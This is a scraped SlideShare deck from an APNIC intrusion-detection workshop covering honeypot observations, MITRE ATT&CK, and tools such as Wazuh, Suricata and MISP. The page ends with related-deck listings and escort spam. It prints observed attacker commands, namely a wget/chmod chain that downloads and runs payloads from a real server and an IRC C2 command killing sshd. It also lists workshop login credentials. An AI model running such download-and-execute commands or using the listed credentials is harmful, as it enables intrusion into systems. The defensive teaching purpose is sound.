SlideShare a Scribd company logo
1 of 47
Download to read offline
Introduction to Intrusion
Detection
Adli Wahid
adli@apnic.net
Let’s Connect!
Adli Wahid (LinkedIn)
The Plan
oObjectives
oAwareness about how threats are executed
oImportance of knowledge driven security
oThinking Process
oNot focusing on specific tools**
oDetection
oUnderstanding Attacks
oExamples
oLet’s make this interactive
We are Under Attack!
Perspective & Context
• Successful or Attempts
• Example:
oActual Login OR
oPort scanning
• Example
• Actual Login AND / OR
• Download & Execute payload
• Other aspects
• Targeted Assets, Source of Attack, Timing,
Files/Artifacts
Where does it fit?
Identify Protect Detect Respond Recover
NIST Cyber Security Framework (v1)
6
Detection
• Key concept in security monitoring, ”detection
engineering”
• Know Your Enemy
• You are the target
• Attacker have capabilities & motives
• Provide Assurance
• Important to understand the different threats
and how they are executed
• Detect implies
• monitoring and knowing what to monitor by
someone
• Being alerted when something happens
• Stages of attack
• Drive action
• Or Policy Change (POST)
• MITRE ATTACK Framework
Observing Attacks
• From APNIC Community Honeynet Project
Multiple Stages
• Typical
o Scanning
o Initial Access
o Execution
o Initial infection
o Actual Payload
o Persistence
• Architecture
• Initial Host
• Serving Payload
• Command & Control
• Managing
X
Target 1
Target
2
9
Knock, Knock!
Timestamp, src_ip, username_attempted, password_attempted
2022-01-13T01:05:26.128718, 117.111.1.143,root,root
2022-01-13T01:18:41.854533, 117.111.1.145,root,root
2022-01-13T05:39:01.444840, 117.111.1.250,root,root
2022-01-13T05:49:50.868138, 117.111.1.139,root,root
2022-01-13T06:24:06.955896, 117.111.1.183,root,root
2022-01-13T08:48:02.869449, 117.111.1.233,root,root
2022-01-13T11:04:05.756191, 117.111.1.168,root,root
2022-01-13T12:29:53.474695, 117.111.1.46,root,root
2022-01-13T12:57:57.219175, 117.111.1.60,root,root
2022-01-13T13:12:33.592252, 117.111.1.186,root,root
10
Once Inside
Src_ip, URL
58.212.107.27,hxxp://61.177.137.133/x/1sh,CN
67.172.200.77,hxxp://61.177.137.133/x/1sh,US
93.131.187.222,hxxp://61.177.137.133/x/1sh,DE
94.224.178.41,hxxp://61.177.137.133/x/1sh,BE
103.125.154.119,hxxp://61.177.137.133/x/1sh,IN
109.219.53.72,hxxp://61.177.137.133/x/1sh,FR
112.53.197.138,hxxp://61.177.137.133/x/1sh,CN
117.111.1.202,hxxp://61.177.137.133/x/1sh,KR
150.101.96.34,hxxp://61.177.137.133/x/1sh,AU
11
B
B
B
B
B
S
T T
B – Bots
T – Target
S – Payload Server
Execution – The Script
wget hxxp://61.177.137.133/x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 777
/var/run/tty0 ; /var/run/tty0 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 777
/var/run/tty1 ; /var/run/tty1 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 777
/var/run/tty2 ; /var/run/tty2 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 777
/var/run/tty3 ; /var/run/tty3 > /dev/null 2>&1 &
12
Communication with Command and Control
Server
1. Malware Download
05/25/2021-02:14:51.304265 [**] [1:2019240:14] ET POLICY Executable
and linking format (ELF) file download Over HTTP [**] [Classification:
Potential Corporate Privacy Violation] [Priority: 1] {TCP} 71.127.148.69:80 ->
10.0.2.15:39526
2. IRC Communication
05/25/2021-02:14:53.336178 [**] [1:2000345:16] ET MALWARE IRC Nick
change on non-standard port [**] [Classification: A Network Trojan was
detected] [Priority: 1] {TCP} 10.0.2.15:54206 -> 202.28.32.30:8080
13
C2
B B
B
B B
NICK x86|x|1|919043|server
USER x00 localhost localhost :2021g
:IRC!IRC@0x.01 PRIVMSG x86|x|1|919043|server :.VERSION.
:. 010 . 127.0.0.1 6667 :
:. 005 . :
:. 376 . :
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
:x86|x|1|919043|server!x00@x.y.z.k JOIN :#0x86
:bot!.@. PRIVMSG #0x86 :!* SH ( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service
sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 &
NOTICE bot :
:0x.01 412 x86|x|1|919043|server :No text to send
S
?
IRC Communication (2)
14
Adversary Tactic & Techniques
• Framework / Knowledge Base of adversary tactic (goals) and
techniques (the how) based on real observation
• Helps the defender to have realistic threat awareness
• Website https://attack.mitre.org/
• Different Focus / Views
• Enterprise, Mobile, ICS
• Mitigations
• Groups **
What Are The Detection Opportunities?
• System / Host
• Service
• Disk
• RAM
• Network
• Src/DST, Payload, Certificates
• What are other important artifacts?
• URLs, Binaries/Files, Hashes
• What tools can we use
• How can we confirm?
Threat Intel Databases
• Purpose:
o Look up your own assets
o Indicators that you can use to monitor (hunt)
• Free & Commercial
• We can use it to look things up
o www.virustotal.com
o https://www.dshield.org/
o Many AVs/EDRs/CTI companies have subscriptions
• Community based – i.e. CERTs/CSIRT community uses MISP
• https://www.misp-project.org/
• Webinar on Threat Intel Sharing
• Automation
https://pastebin.com/K8nGtVYt
File Integrity Monitoring
• Changes to disk
• Is it authorized? What is it?
o /etc/resolv.conf
o New Crontab entries
o Registry
• What if file is deleted immediately by attacker after execution?
• It can be recovered (if system is running) /proc
• Activities can be observed (on system or from RAM)
• What tools can we use?
• AV / EDR
• Centralized logging – Sysmon, filebeats + Elasticsearch + create rules + Alerting
• Wazuh
Other Activities On Host
• Adding / Removing /Modifying
• Users
• Services
• Applications
• Files
• Config
• CPU / Process
• Going Deeper ***
oProfiling attacks
oAttribution
Network
• Compromised host need to call home!
• Detection based on content/headers of network packets
o (Known) Exploits
o Threat Intel
o IP / Domain is Command & Control
o IP is a TOR Exit node
o Details in CERTIFICATEs during TSL handshake session
• Network Intrusion Detection System
• Packet capture / Dissector + Signature matching + threat intel
• Suricata *** / Zeek
• Arkime
Encrypted Traffic
It’s always the DNS
• DNS
oIf host is looking up known malicious or suspicious domain
oEven if it is block or prevented **
oDo you have visibility of the DNS
• Scenario
• One host compromised
• DNS query to monero.miningpool.zyx
• Question – is there any other host that has been compromised?
Honeypots & Honey Tokens
• How do we know if attackers are in our infrastructure?
• Exploit attackers activities
o Lateral movement – scan and/or connect to other services
o Accessing documents, files , starting service
• Honeypots
o Emulate services that has no production value
o Any access is suspect (no / very low false positive)
o Monitor for attempts to access / exploit
o Open source & Commercial solutions available
• Honeytokens
o Digital artifacts that has no production value
o Once accessed/loaded/open we will get an alert
Scan For Server Config
HoneyTokens
www.canarytokens.org
Detection by Others
• IPs from your network scanning/attacking other hosts on the
Internet
• One of your server hosting malware
• Database from one of your server is on the darkweb
• Stolen credentials from password stealers or botnet
• Someone discover a vulnerability on your website **
• Proactively looking for these things is possible
• Let other security teams, researchers notify you
• But How?
Haveibeenpwned.com
Shodan.io
Get Notified
Shodan.io
Haveibeenpwned.com
Daily Scans with API
Security.txt
• Security Contact information on your website
• www.yourdomain.com/security.txt
• Basically information – on how to contact the security person in
charge + what is the scope + PGP keys
• www.securitytxt.org
CERT/CSIRT
• Dedicated team for dealing with incidents
• Monitor emails
• Integrate with ticketing system / Slack alert etc
• Process in places for processing the report
• National CERT/CSIRT would normally be contacted by other external
or international teams
• www.apcert.org
• www.first.org
• In the absence of one maybe sure you are reachable
• WHOIS IP
• WHOIS Domain
Wrapping UP
• Detection is a critical concept
o Mitigate attack in progress
o Improve security policies / Better Controls
o Awareness
• Implies knowledge in attacker techniques and tactics
o Analysts needed!
• Coverage / Visibility
o Due to limitation of tech or blind spot
• Detection technologies – signature based have limitations
• AI?
• Note: Attackers are human J
• Incident Response Plan
o Practice
o Trusted Network
• Dealing with unknown
• Using MITRE Attack Framework
• Allocate for regular learning / conference / sharing
Learning More
• Check out some free courses with Labs on
https://academy.apnic.net
oSecurity Monitoring
oHoneypot
o Suricata IDS 101
oThreat Intel Sharing Webinar
Day #5
• Recap of Day #4
• Traffic light protocol
• Systems / Demo
o Wazuh
oDFIR-IRIS (Case Management)
oMISP – Community Wide Sharing
• Operation Security
• Moving Forward
sudo shutdown –h now
Day 4 Recap
• MITRE Attack Framework
• Understanding stages of attack
• Break down into Tactic & Teqniques
• Breack down by platform (Linux, Windows, etc)
• Detection!
• Mapping with groups, integration with Tools etc etc
oLabs
o Memory Dump & Packet Analysis
o Volatility
o Suricata (IDS / Packet Analysis)
o Artifacts, Indicators of Compromise Extraction
o academy.apnic.net
o Future workshops?
Sharing - Rules of Engagement
• Important for building trust!
o Need to know basis
• Telling others:
• How the information should be handled
• Our expectation
• Who can they share it with
• Enforcement
• By systems i.e. to prevent accidental leak
• How
• Label & Warning
• CERT /CSIRT Community - Traffic Light Protocol (TLP)
FIRST.org Traffic Light Protocol -
https://www.first.org/tlp/
Tools for Enabling Sharing (and Investigation)
EDR / SIEM
/etc /
Security
Monitoring
Case /
Incident
Management
INTERNAL
Community
Threat
Sharing
Platform
Community
Other
Community
Threat
Sharing
Platform
Threat Intel DB for
enrichment
Analysis Engines
Tools for Enabling Sharing (and Investigation)
Wazuh DFIR-IRIS
INTERNAL
MISP
Community
Other
Community
Threat
Sharing
Platform
Threat Intel DB for
enrichment
Analysis Engines
Wazuh
owww.wazuh.com
oSIEM / EDR – Free & Open Source
oFile Integrity Monitoring
oAuthentication
oIntegration with other tools (i.e. Suricata, Yara)
oActive Respone
oAgent / Agentless ***
oIntegration with TI to enrich IOC (Indicators of Compromise)
oOther – Vulnerability, Compliance,
oAPIs – send data to other platforms
Wazuh
• File Integrity Monitoring
• VirusTotal (API needed)
• Suricata Alerts
• Authentication
• Vulnerability Management
https://wazuh.honeynet.asia
admin
SecretPassword
DFIR-IRIS
• Track Elements observed during investigation
• Collaboration - share pieces of information between analysts
• Automation i.e. Enrichment of IOCs
DFIR-IRIS
• Adding Cases from investigation
• Adding IOCs
• Asset Link
• Assigning Task
• Timeline
• Integration with other tools
• VT / MISP for enrichment
https://iris.honeynet.asia
User: alice
Password: FijiWorkshop2023
User: bob
Password: FijiWorkshop2023
MISP
• Threat Sharing Platform for Community
• Open Source and Free
• Many Community Uses it
• Demo
• Adding Events
• Adding Attributes
• Other features of the tool
https://misp.honeynet.asia
Username:
fijiworkshop@company.com
FijiWorkshop2023
Operational Security
• Ethical (https://www.ethicsfirst.org)
• Dealing with malicious activities and criminal infrastructure
• Dedicate device / VM
o Network
o i.e. accidentally executing malware in the network
• VPN / TOR
• Anonymising IP address
• Tor-project.org
• Quick Demo using torify
• Encryption
• Email: PGP**
• Other Channels
• Slack, Signal, Keybase
Moving Forward – FJ Critical Infrastructure
Group
• Rethink about improving your security
o https://github.com/certsocietegenerale/IRM
o https://ciso-ksp.kpnnet.org/framework/KSP
o https://www.first.org/resources/guides/Establishing-CSIRT-v1.2.pdf
• Setting up this community and group
• What we need :
1. Rules of engagement (i.e TLP) and Expectations
2. Regular Activities
3. Infrastructure – web, email, servers
4. Volunteers
5. Planning for future events
6. Initiatives / Problems to address (Minimum security / Vuln)
7. Engagements
• Who else should we invite and convince to join J
• Who can contribute?
Discussion
Contact
adli@apnic.net
Adli Wahid on LinkedIN
Thank You
Adli Wahid (LinkedIn)
adli@apnic.net
www.apnic.net

More Related Content

Similar to 2023 NCIT: Introduction to Intrusion Detection

Ethical Hacking
Ethical HackingEthical Hacking
Ethical HackingRohan Raj
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Spyglass Security
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecLalit Kale
 
IDS for Security Analysts: How to Get Actionable Insights from your IDS
IDS for Security Analysts: How to Get Actionable Insights from your IDSIDS for Security Analysts: How to Get Actionable Insights from your IDS
IDS for Security Analysts: How to Get Actionable Insights from your IDSAlienVault
 
Incident response, Hacker Techniques and Countermeasures
Incident response, Hacker Techniques and CountermeasuresIncident response, Hacker Techniques and Countermeasures
Incident response, Hacker Techniques and CountermeasuresJose L. Quiñones-Borrero
 
Chapter 15 incident handling
Chapter 15 incident handlingChapter 15 incident handling
Chapter 15 incident handlingnewbie2019
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineLastline, Inc.
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 
Tsc2021 cyber-issues
Tsc2021 cyber-issuesTsc2021 cyber-issues
Tsc2021 cyber-issuesErnest Staats
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
Remote forensics fsec2016 delija draft
Remote forensics fsec2016 delija draftRemote forensics fsec2016 delija draft
Remote forensics fsec2016 delija draftDamir Delija
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNorth Texas Chapter of the ISSA
 
Expand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataExpand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataPrecisely
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationSatria Ady Pradana
 

Similar to 2023 NCIT: Introduction to Intrusion Detection (20)

Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Vapt life cycle
Vapt life cycleVapt life cycle
Vapt life cycle
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
IDS for Security Analysts: How to Get Actionable Insights from your IDS
IDS for Security Analysts: How to Get Actionable Insights from your IDSIDS for Security Analysts: How to Get Actionable Insights from your IDS
IDS for Security Analysts: How to Get Actionable Insights from your IDS
 
Incident response, Hacker Techniques and Countermeasures
Incident response, Hacker Techniques and CountermeasuresIncident response, Hacker Techniques and Countermeasures
Incident response, Hacker Techniques and Countermeasures
 
Session Slide
Session SlideSession Slide
Session Slide
 
Chapter 15 incident handling
Chapter 15 incident handlingChapter 15 incident handling
Chapter 15 incident handling
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
Tsc2021 cyber-issues
Tsc2021 cyber-issuesTsc2021 cyber-issues
Tsc2021 cyber-issues
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
Remote forensics fsec2016 delija draft
Remote forensics fsec2016 delija draftRemote forensics fsec2016 delija draft
Remote forensics fsec2016 delija draft
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
 
Expand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataExpand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and Data
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Software Security and IDS.pptx
Software Security and IDS.pptxSoftware Security and IDS.pptx
Software Security and IDS.pptx
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 

More from APNIC

DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119APNIC
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119APNIC
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119APNIC
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119APNIC
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119APNIC
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...APNIC
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonAPNIC
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonAPNIC
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPNIC
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6APNIC
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!APNIC
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023APNIC
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAPNIC
 
AFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAPNIC
 
AFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAPNIC
 

More from APNIC (20)

DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet development
 
AFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment Status
 
AFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressing
 

Recently uploaded

VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
Russian Call girls in Dubai +971563133746 Dubai Call girls
Russian  Call girls in Dubai +971563133746 Dubai  Call girlsRussian  Call girls in Dubai +971563133746 Dubai  Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceDelhi Call girls
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.soniya singh
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 
